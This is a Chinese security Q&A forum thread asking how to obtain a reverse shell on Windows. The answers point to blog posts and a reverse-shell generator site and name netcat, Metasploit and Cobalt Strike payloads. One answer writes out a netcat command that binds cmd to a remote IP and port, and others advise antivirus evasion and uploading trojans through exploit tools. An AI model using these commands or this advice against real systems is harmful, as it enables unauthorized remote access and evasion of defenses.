windows环境反弹shell是如何操作的?

windows环境下反弹shell,有哪些途径?罗列一下呗

请先 登录 后评论

6 个回答

空城 - 安全小菜鸡

可以参考一下:

https://blog.csdn.net/guo15890025019/article/details/118806251

https://blog.csdn.net/weixin_32838901/article/details/113450504

请先 登录 后评论
这个夏天计划

nc

msf或cs马

请先 登录 后评论
冰幽

window反弹shell

https://www.jianshu.com/p/1a9ff74fee48

反弹shell命令一键生成

https://forum.ywhack.com/reverse-shell/

请先 登录 后评论
Colorado

最简单的一种就是,一端监听,一端发起,从而建立数据通信,nc.exe -e cmd ip 端口   。  nc -lvvp 端口

请先 登录 后评论
F_Lib

你可以用CS进行生成,比如python类型的,php类型的,powershell,等等很多。但是你需要会免杀,不然会被杀软杀掉的。

请先 登录 后评论
WY3507

反弹用nc 看你是利用的什么漏洞 有许多命令执行的漏洞都会有工具(py脚本的以及可视化漏洞工具)直接用他们执行命令也一样。甚至直接帮你上传木马 针对撒漏洞就可以去github上找

请先 登录 后评论